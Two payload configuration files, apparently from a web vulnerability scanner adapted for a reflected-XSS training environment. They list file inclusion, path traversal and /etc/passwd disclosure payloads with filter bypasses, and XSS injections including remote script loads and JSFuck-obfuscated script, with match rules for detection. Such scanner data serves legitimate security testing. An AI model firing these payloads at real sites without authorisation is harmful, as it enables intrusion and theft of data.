/gym_reflected_xss/attack_module/config/attacks/fileHandlingPayloads.ini:
--------------------------------------------------------------------------------
  1 | ; Each payload can match one or more detection rules.
  2 | ; Each rule will generate one specific success message.
  3 | ; A rule must be at the same position than its corresponding message.
  4 | ; If there is X rules then you must specify X messages even if it is the same one.
  5 | [remote_inclusion]
  6 | payload = [EXTERNAL_ENDPOINT]e.php
  7 | rules = aa9d05b9ab864e169d723e9668d3dc77
  8 |     w4p1t1_cleartext
  9 | messages = Remote inclusion vulnerability
 10 |     Remote file disclosure vulnerability
 11 | 
 12 | [remote_inclusion_with_nul]
 13 | payload = [EXTERNAL_ENDPOINT]e.php\0
 14 | rules = aa9d05b9ab864e169d723e9668d3dc77
 15 |     w4p1t1_cleartext
 16 | messages = Remote inclusion vulnerability
 17 |     Remote file disclosure vulnerability
 18 | 
 19 | [local_passwd]
 20 | payload = /etc/passwd
 21 | rules = root:x:0:0
 22 |     root:*:0:0
 23 | messages = Linux local file disclosure vulnerability
 24 |     BSD local file disclosure vulnerability
 25 | 
 26 | [local_passwd_with_null]
 27 | payload = /etc/passwd\0
 28 | rules = root:x:0:0
 29 |     root:*:0:0
 30 | messages = Linux local file disclosure vulnerability
 31 |     BSD local file disclosure vulnerability
 32 | 
 33 | [local_unix_services]
 34 | payload = /etc/services
 35 | rules = Network services, Internet style
 36 |     RFC6335
 37 | messages = Unix local file disclosure vulnerability
 38 |     Unix local file disclosure vulnerability
 39 | 
 40 | [local_unix_services_with_null]
 41 | payload = /etc/services\0
 42 | rules = Network services, Internet style
 43 |     RFC6335
 44 | messages = Unix local file disclosure vulnerability
 45 |     Unix local file disclosure vulnerability
 46 | 
 47 | [local_windows_backslash]
 48 | payload = C:\Windows\System32\drivers\etc\services
 49 | rules = defined by IANA
 50 | messages = Windows local file disclosure vulnerability
 51 | 
 52 | [local_windows_backslash_with_null]
 53 | payload = C:\Windows\System32\drivers\etc\services\0
 54 | rules = defined by IANA
 55 | messages = Windows local file disclosure vulnerability
 56 | 
 57 | [local_windows_backslash_with_ads]
 58 | payload = C:\Windows\System32\drivers\etc\services::$DATA
 59 | rules = defined by IANA
 60 | messages = Windows local file disclosure vulnerability
 61 | 
 62 | [local_windows_slash]
 63 | payload = C:/Windows/System32/drivers/etc/services
 64 | rules = defined by IANA
 65 | messages = Windows local file disclosure vulnerability
 66 | 
 67 | [local_windows_slash_with_null]
 68 | payload = C:/Windows/System32/drivers/etc/services\0
 69 | rules = defined by IANA
 70 | messages = Windows local file disclosure vulnerability
 71 | 
 72 | [local_windows_slash_with_ads]
 73 | payload = C:/Windows/System32/drivers/etc/services::$DATA
 74 | rules = defined by IANA
 75 | messages = Windows local file disclosure vulnerability
 76 | 
 77 | [local_unix_ten_up]
 78 | payload = ../../../../../../../../../../lib/
 79 | rules = libc.so.
 80 | messages = Unix Directory traversal vulnerability
 81 | 
 82 | [local_windows_ten_up]
 83 | payload = ../../../../../../../../../../windows/
 84 | rules = notepad.exe
 85 | messages = Windows Directory traversal vulnerability
 86 | 
 87 | [local_passwd_ten_up]
 88 | payload = ../../../../../../../../../../etc/passwd
 89 | rules = root:x:0:0
 90 |     root:*:0:0
 91 | messages = Linux local file disclosure vulnerability
 92 |     BSD local file disclosure vulnerability
 93 | 
 94 | [local_passwd_twenty_up]
 95 | payload = ../../../../../../../../../../../../../../../../../../../../etc/passwd
 96 | rules = root:x:0:0
 97 |     root:*:0:0
 98 | messages = Linux local file disclosure vulnerability
 99 |     BSD local file disclosure vulnerability
100 | 
101 | [local_passwd_ten_up_with_null]
102 | payload = ../../../../../../../../../../etc/passwd\0
103 | rules = root:x:0:0
104 |     root:*:0:0
105 | messages = Linux local file disclosure vulnerability
106 |     BSD local file disclosure vulnerability
107 | 
108 | [local_passwd_twenty_up_with_null]
109 | payload = ../../../../../../../../../../../../../../../../../../../../etc/passwd\0
110 | rules = root:x:0:0
111 |     root:*:0:0
112 | messages = Linux local file disclosure vulnerability
113 |     BSD local file disclosure vulnerability
114 | 
115 | [local_unix_services_ten_up]
116 | payload = ../../../../../../../../../../etc/services
117 | rules = Network services, Internet style
118 |     RFC6335
119 | messages = Unix local file disclosure vulnerability
120 |     Unix local file disclosure vulnerability
121 | 
122 | [local_unix_services_twenty_up]
123 | payload = ../../../../../../../../../../../../../../../../../../../../etc/services
124 | rules = Network services, Internet style
125 |     RFC6335
126 | messages = Unix local file disclosure vulnerability
127 |     Unix local file disclosure vulnerability
128 | 
129 | [local_unix_services_ten_up_with_null]
130 | payload = ../../../../../../../../../../etc/services\0
131 | rules = Network services, Internet style
132 |     RFC6335
133 | messages = Unix local file disclosure vulnerability
134 |     Unix local file disclosure vulnerability
135 | 
136 | [local_unix_services_twenty_up_with_null]
137 | payload = ../../../../../../../../../../../../../../../../../../../../etc/services\0
138 | rules = Network services, Internet style
139 |     RFC6335
140 | messages = Unix local file disclosure vulnerability
141 |     Unix local file disclosure vulnerability
142 | 
143 | [local_windows_slash_ten_up]
144 | payload = ../../../../../../../../../../Windows/System32/drivers/etc/services
145 | rules = defined by IANA
146 | messages = Windows local file disclosure vulnerability
147 | 
148 | [local_windows_slash_twenty_up]
149 | payload = ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
150 | rules = defined by IANA
151 | messages = Windows local file disclosure vulnerability
152 | 
153 | [local_windows_slash_ten_up_with_null]
154 | payload = ../../../../../../../../../../Windows/System32/drivers/etc/services\0
155 | rules = defined by IANA
156 | messages = Windows local file disclosure vulnerability
157 | 
158 | [local_windows_slash_twenty_up_with_null]
159 | payload = ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
160 | rules = defined by IANA
161 | messages = Windows local file disclosure vulnerability
162 | 
163 | [local_passwd_starts_with_ten_up]
164 | payload = [VALUE]/../../../../../../../../../../etc/passwd
165 | rules = root:x:0:0
166 |     root:*:0:0
167 | messages = Linux local file disclosure vulnerability
168 |     BSD local file disclosure vulnerability
169 | 
170 | [local_passwd_starts_with_twenty_up]
171 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
172 | rules = root:x:0:0
173 |     root:*:0:0
174 | messages = Linux local file disclosure vulnerability
175 |     BSD local file disclosure vulnerability
176 | 
177 | [local_passwd_starts_with_ten_up_with_null]
178 | payload = [VALUE]/../../../../../../../../../../etc/passwd\0
179 | rules = root:x:0:0
180 |     root:*:0:0
181 | messages = Linux local file disclosure vulnerability
182 |     BSD local file disclosure vulnerability
183 | 
184 | [local_passwd_starts_with_twenty_up_with_null]
185 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
186 | rules = root:x:0:0
187 |     root:*:0:0
188 | messages = Linux local file disclosure vulnerability
189 |     BSD local file disclosure vulnerability
190 | 
191 | [local_unix_services_starts_with_ten_up]
192 | payload = [VALUE]/../../../../../../../../../../etc/services
193 | rules = Network services, Internet style
194 |     RFC6335
195 | messages = Unix local file disclosure vulnerability
196 |     Unix local file disclosure vulnerability
197 | 
198 | [local_unix_services_starts_with_twenty_up]
199 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
200 | rules = Network services, Internet style
201 |     RFC6335
202 | messages = Unix local file disclosure vulnerability
203 |     Unix local file disclosure vulnerability
204 | 
205 | [local_unix_services_starts_with_ten_up_with_null]
206 | payload = [VALUE]/../../../../../../../../../../etc/services\0
207 | rules = Network services, Internet style
208 |     RFC6335
209 | messages = Unix local file disclosure vulnerability
210 |     Unix local file disclosure vulnerability
211 | 
212 | [local_unix_services_starts_with_twenty_up_with_null]
213 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
214 | rules = Network services, Internet style
215 |     RFC6335
216 | messages = Unix local file disclosure vulnerability
217 |     Unix local file disclosure vulnerability
218 | 
219 | [local_windows_slash_starts_with_ten_up]
220 | payload = [VALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services
221 | rules = defined by IANA
222 | messages = Windows local file disclosure vulnerability
223 | 
224 | [local_windows_slash_starts_with_twenty_up]
225 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
226 | rules = defined by IANA
227 | messages = Windows local file disclosure vulnerability
228 | 
229 | [local_windows_slash_starts_with_ten_up_with_null]
230 | payload = [VALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services\0
231 | rules = defined by IANA
232 | messages = Windows local file disclosure vulnerability
233 | 
234 | [local_windows_slash_starts_with_twenty_up_with_null]
235 | payload = [VALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
236 | rules = defined by IANA
237 | messages = Windows local file disclosure vulnerability
238 | 
239 | [local_passwd_starts_with_dir_ten_up]
240 | payload = [DIRVALUE]/../../../../../../../../../../etc/passwd
241 | rules = root:x:0:0
242 |     root:*:0:0
243 | messages = Linux local file disclosure vulnerability
244 |     BSD local file disclosure vulnerability
245 | 
246 | [local_passwd_starts_with_dir_tewnty_up]
247 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
248 | rules = root:x:0:0
249 |     root:*:0:0
250 | messages = Linux local file disclosure vulnerability
251 |     BSD local file disclosure vulnerability
252 | 
253 | [local_passwd_starts_with_dir_ten_up_with_null]
254 | payload = [DIRVALUE]/../../../../../../../../../../etc/passwd\0
255 | rules = root:x:0:0
256 |     root:*:0:0
257 | messages = Linux local file disclosure vulnerability
258 |     BSD local file disclosure vulnerability
259 | 
260 | [local_passwd_starts_with_dir_twenty_up_with_null]
261 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
262 | rules = root:x:0:0
263 |     root:*:0:0
264 | messages = Linux local file disclosure vulnerability
265 |     BSD local file disclosure vulnerability
266 | 
267 | [local_unix_services_starts_with_dir_ten_up]
268 | payload = [DIRVALUE]/../../../../../../../../../../etc/services
269 | rules = Network services, Internet style
270 |     RFC6335
271 | messages = Unix local file disclosure vulnerability
272 |     Unix local file disclosure vulnerability
273 | 
274 | [local_unix_services_starts_with_dir_twenty_up]
275 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services
276 | rules = Network services, Internet style
277 |     RFC6335
278 | messages = Unix local file disclosure vulnerability
279 |     Unix local file disclosure vulnerability
280 | 
281 | [local_unix_services_starts_with_dir_ten_up_with_null]
282 | payload = [DIRVALUE]/../../../../../../../../../../etc/services\0
283 | rules = Network services, Internet style
284 |     RFC6335
285 | messages = Unix local file disclosure vulnerability
286 |     Unix local file disclosure vulnerability
287 | 
288 | [local_unix_services_starts_with_dir_twenty_up_with_null]
289 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/services\0
290 | rules = Network services, Internet style
291 |     RFC6335
292 | messages = Unix local file disclosure vulnerability
293 |     Unix local file disclosure vulnerability
294 | 
295 | [local_windows_slash_starts_with_dir_ten_up]
296 | payload = [DIRVALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services
297 | rules = defined by IANA
298 | messages = Windows local file disclosure vulnerability
299 | 
300 | [local_windows_slash_starts_with_dir_twenty_up]
301 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
302 | rules = defined by IANA
303 | messages = Windows local file disclosure vulnerability
304 | 
305 | [local_windows_slash_starts_with_dir_ten_up_with_null]
306 | payload = [DIRVALUE]/../../../../../../../../../../Windows/System32/drivers/etc/services\0
307 | rules = defined by IANA
308 | messages = Windows local file disclosure vulnerability
309 | 
310 | [local_windows_slash_starts_with_dir_twenty_up_with_null]
311 | payload = [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services\0
312 | rules = defined by IANA
313 | messages = Windows local file disclosure vulnerability
314 | 
315 | [local_passwd_file_wrapper]
316 | payload = file:///etc/passwd
317 | rules = root:x:0:0
318 |     root:*:0:0
319 | messages = Linux local file disclosure vulnerability
320 |     BSD local file disclosure vulnerability
321 | 
322 | [local_windows_file_wrapper]
323 | payload = file://C:\Windows\System32\drivers\etc\services
324 | rules = defined by IANA
325 | messages = Windows local file disclosure vulnerability
326 | 
327 | [local_passwd_bypass_dotdotslash]
328 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
329 | rules = root:x:0:0
330 |     root:*:0:0
331 | messages = Linux local file disclosure vulnerability
332 |     BSD local file disclosure vulnerability
333 | 
334 | [local_passwd_bypass_dotdotslash_with_null]
335 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd\0
336 | rules = root:x:0:0
337 |     root:*:0:0
338 | messages = Linux local file disclosure vulnerability
339 |     BSD local file disclosure vulnerability
340 | 
341 | [local_unix_services_bypass_dotdotslash]
342 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
343 | rules = Network services, Internet style
344 |     RFC6335
345 | messages = Unix local file disclosure vulnerability
346 |     Unix local file disclosure vulnerability
347 | 
348 | [local_unix_services_bypass_dotdotslash_with_null]
349 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services\0
350 | rules = Network services, Internet style
351 |     RFC6335
352 | messages = Unix local file disclosure vulnerability
353 |     Unix local file disclosure vulnerability
354 | 
355 | [local_windows_bypass_dotdotslash]
356 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
357 | rules = defined by IANA
358 | messages = Windows local file disclosure vulnerability
359 | 
360 | [local_windows_bypass_dotdotslash_with_null]
361 | payload = ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services\0
362 | rules = defined by IANA
363 | messages = Windows local file disclosure vulnerability
364 | 
365 | [local_passwd_bypass_ext]
366 | payload = /etc/passwd\0.[EXTVALUE]
367 | rules = root:x:0:0
368 |     root:*:0:0
369 | messages = Linux local file disclosure vulnerability
370 |     BSD local file disclosure vulnerability
371 | 
372 | [local_windows_bypass_ext]
373 | payload = c:\Windows\System32\drivers\etc\services\0.[EXTVALUE]
374 | rules = defined by IANA
375 | messages = Windows local file disclosure vulnerability
376 | 
377 | [local_passwd_bypass_ext_ten_up]
378 | payload = ../../../../../../../../../../etc/passwd\0.[EXTVALUE]
379 | rules = root:x:0:0
380 |     root:*:0:0
381 | messages = Linux local file disclosure vulnerability
382 |     BSD local file disclosure vulnerability
383 | 
384 | [local_windows_bypass_ext_ten_up]
385 | payload = ../../../../../../../../../../windows/System32/drivers/etc/services\0.[EXTVALUE]
386 | rules = defined by IANA
387 | messages = Windows local file disclosure vulnerability
388 | 
389 | [local_current_file]
390 | payload = [FILE_NAME]
391 | rules = <?php
392 | messages = Possible source code disclosure
393 | 
394 | [local_current_file_with_null]
395 | payload = [FILE_NAME]\0
396 | rules = <?php
397 | messages = Possible source code disclosure
398 | 
399 | [local_current_file_with_ads]
400 | payload = [FILE_NAME]::$DATA
401 | rules = <?php
402 | messages = Possible source code disclosure
403 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/attacks/xssPayloads.ini:
--------------------------------------------------------------------------------
  1 | ; Let's start with the most obvious XSS payloads
  2 | [script_absolute_src]
  3 | payload = <script src=https://wapiti3.ovh/__XSS__z.js></script>
  4 | tag = script
  5 | attribute = src
  6 | value = https://wapiti3.ovh/__XSS__z.js
  7 | case_sensitive = no
  8 | 
  9 | [script_protocol_src]
 10 | payload = <script src=//wapiti3.ovh/__XSS__z.js></script>
 11 | tag = script
 12 | attribute = src
 13 | value = //wapiti3.ovh/__XSS__z.js
 14 | case_sensitive = no
 15 | 
 16 | [script_alert_quote]
 17 | payload = <script>alert('__XSS__')</script>
 18 | tag = script
 19 | attribute = string
 20 | value = alert('__XSS__')
 21 | case_sensitive = yes
 22 | 
 23 | [script_alert_double_quote]
 24 | payload = <script>alert("__XSS__")</script>
 25 | tag = script
 26 | attribute = string
 27 | value = alert("__XSS__")
 28 | case_sensitive = yes
 29 | 
 30 | [script_alert_regex]
 31 | payload = <script>alert(/__XSS__/)</script>
 32 | tag = script
 33 | attribute = string
 34 | value = alert(/__XSS__/)
 35 | case_sensitive = yes
 36 | 
 37 | [script_jsfuck_13_plus_37]
 38 | payload = <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[!+[]+!+[]+!+[]]+(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])()</script>
 39 | tag = script
 40 | attribute = string
 41 | value = [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[!+[]+!+[]+!+[]]+(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])()
 42 | case_sensitive = no
 43 | 
 44 | [script_fromcharcode]
 45 | payload = <script>String.fromCharCode(0,__XSS__,1)</script>
 46 | tag = script
 47 | attribute = string
 48 | value = String.fromCharCode(0,__XSS__,1)
 49 | case_sensitive = yes
 50 | 
 51 | [script_alert_parentheses_regex]
 52 | payload = <script>(alert)(/__XSS__/);</script>
 53 | tag = script
 54 | attribute = string
 55 | value = (alert)(/__XSS__/);
 56 | case_sensitive = yes
 57 | 
 58 | [img_onerror_alert_double_quote]
 59 | payload = <img src=. onerror=alert("__XSS__")>
 60 | tag = img
 61 | attribute = onerror
 62 | value = alert("__XSS__")
 63 | case_sensitive = yes
 64 | 
 65 | [img_onerror_alert_quote]
 66 | payload = <img src=. onerror=alert('__XSS__')>
 67 | tag = img
 68 | attribute = onerror
 69 | value = alert('__XSS__')
 70 | case_sensitive = yes
 71 | 
 72 | [img_onerror_alert_regex]
 73 | payload = <img src=. onerror=alert(/__XSS__/)>
 74 | tag = img
 75 | attribute = onerror
 76 | value = alert(/__XSS__/)
 77 | case_sensitive = yes
 78 | 
 79 | [img_onerror_fromcharcode]
 80 | payload = <img src=. onerror=String.fromCharCode(0,__XSS__,1)>
 81 | tag = img
 82 | attribute = onerror
 83 | value = String.fromCharCode(0,__XSS__,1)
 84 | case_sensitive = yes
 85 | 
 86 | [object_data_alert_quote]
 87 | payload = <object data="javascript:alert('__XSS__')">
 88 | tag = object
 89 | attribute = data
 90 | value = javascript:alert('__XSS__')
 91 | case_sensitive = yes
 92 | 
 93 | [object_data_fromcharcode]
 94 | payload = <object data=javascript:String.fromCharCode(0,__XSS__,1)>
 95 | tag = object
 96 | attribute = data
 97 | value = javascript:String.fromCharCode(0,__XSS__,1)
 98 | case_sensitive = yes
 99 | 
100 | [param_value_alert_quote]
101 | payload = <object><param name=x value=javascript:alert('__XSS__')></object>
102 | tag = param
103 | attribute = value
104 | value = javascript:alert('__XSS__')
105 | case_sensitive = yes
106 | 
107 | [param_value_alert_double_quote]
108 | payload = <object><param name=x value=javascript:alert("__XSS__")></object>
109 | tag = param
110 | attribute = value
111 | value = javascript:alert("__XSS__")
112 | case_sensitive = yes
113 | 
114 | [param_value_fromcharcode]
115 | payload = <object><param name=x value=javascript:String.fromCharCode(0,__XSS__,1)></object>
116 | tag = param
117 | attribute = value
118 | value = javascript:String.fromCharCode(0,__XSS__,1)
119 | case_sensitive = yes
120 | 
121 | [iframe_src_javascript]
122 | payload = <iframe src="javascript:String.fromCharCode(0,__XSS__,1);"></iframe>
123 | tag = iframe
124 | attribute = src
125 | value = javascript:String.fromCharCode(0,__XSS__,1)
126 | case_sensitive = yes
127 | 
128 | [frame_src_javascript]
129 | payload = <frameset><frame src="javascript:String.fromCharCode(0,__XSS__,1);"></frame>
130 | tag = frame
131 | attribute = src
132 | value = javascript:String.fromCharCode(0,__XSS__,1)
133 | case_sensitive = yes
134 | 
135 | 
136 | 
137 | ; Tricks
138 | [script_slash_absolute_src]
139 | payload = <script/ src=https://wapiti3.ovh/__XSS__z.js></script/>
140 | tag = script
141 | attribute = src
142 | value = https://wapiti3.ovh/__XSS__z.js
143 | case_sensitive = no
144 | 
145 | 
146 | 
147 | ; Those are simple case sensitive bypass
148 | [case_script_alert_quote]
149 | payload = <ScRiPt>alert('__XSS__')</sCrIpT>
150 | tag = script
151 | attribute = string
152 | value = alert('__XSS__')
153 | case_sensitive = yes
154 | 
155 | [case_script_alert_double_quote]
156 | payload = <ScRiPt>alert("__XSS__")</sCrIpT>
157 | tag = script
158 | attribute = string
159 | value = alert("__XSS__")
160 | case_sensitive = yes
161 | 
162 | [case_script_alert_regex]
163 | payload = <ScRiPt>alert(/__XSS__/)</sCrIpT>
164 | tag = script
165 | attribute = string
166 | value = alert(/__XSS__/)
167 | case_sensitive = yes
168 | 
169 | [case_script_fromcharcode]
170 | payload = <ScRiPt>String.fromCharCode(0,__XSS__,1)</sCrIpT>
171 | tag = script
172 | attribute = string
173 | value = String.fromCharCode(0,__XSS__,1)
174 | case_sensitive = yes
175 | 
176 | [case_script_absolute_src]
177 | payload = <ScRiPt src=https://wapiti3.ovh/__XSS__z.js></sCrIpT>
178 | tag = script
179 | attribute = src
180 | value = https://wapiti3.ovh/__XSS__z.js
181 | case_sensitive = no
182 | 
183 | [case_script_slash_absolute_src]
184 | payload = <ScRiPt/ src=https://wapiti3.ovh/__XSS__z.js></sCrIpT/>
185 | tag = script
186 | attribute = src
187 | value = https://wapiti3.ovh/__XSS__z.js
188 | case_sensitive = no
189 | 
190 | [case_script_jsfuck_13_plus_37]
191 | payload = <ScRiPt>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[!+[]+!+[]+!+[]]+(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])()</sCrIpT>
192 | tag = script
193 | attribute = string
194 | value = [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[!+[]+!+[]+!+[]]+(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])()
195 | case_sensitive = no
196 | 
197 | 
198 | 
199 | ; Try injecting whitespaces...
200 | [tab_script_absolute_src]
201 | payload = <script[TAB]src=https://wapiti3.ovh/__XSS__z.js></script>
202 | tag = script
203 | attribute = src
204 | value = https://wapiti3.ovh/__XSS__z.js
205 | case_sensitive = no
206 | 
207 | [case_tab_script_absolute_src]
208 | payload = <ScRiPt[TAB]src=https://wapiti3.ovh/__XSS__z.js></sCrIpT>
209 | tag = script
210 | attribute = src
211 | value = https://wapiti3.ovh/__XSS__z.js
212 | case_sensitive = no
213 | 
214 | [tab_img_onerror_fromcharcode]
215 | payload = <img[TAB]src=.[TAB]onerror=String.fromCharCode(0,__XSS__,1)>
216 | tag = img
217 | attribute = onerror
218 | value = String.fromCharCode(0,__XSS__,1)
219 | case_sensitive = yes
220 | 
221 | [space_script_alert_quote]
222 | payload = <script >alert('__XSS__')</script >
223 | tag = script
224 | attribute = string
225 | value = alert('__XSS__')
226 | case_sensitive = yes
227 | 
228 | [space_script_alert_double_quote]
229 | payload = <script >alert("__XSS__")</script >
230 | tag = script
231 | attribute = string
232 | value = alert("__XSS__")
233 | case_sensitive = yes
234 | 
235 | [space_script_fromcharcode]
236 | payload = <script >String.fromCharCode(0,__XSS__,1)</script >
237 | tag = script
238 | attribute = string
239 | value = String.fromCharCode(0,__XSS__,1)
240 | case_sensitive = yes
241 | 
242 | [case_space_script_fromcharcode]
243 | payload = <ScRiPt >String.fromCharCode(0,__XSS__,1)</ sCrIpT>
244 | tag = script
245 | attribute = string
246 | value = String.fromCharCode(0,__XSS__,1)
247 | case_sensitive = yes
248 | 
249 | [case_tab_script_fromcharcode]
250 | payload = <ScRiPt[TAB]>String.fromCharCode(0,__XSS__,1)</[TAB]sCrIpT>
251 | tag = script
252 | attribute = string
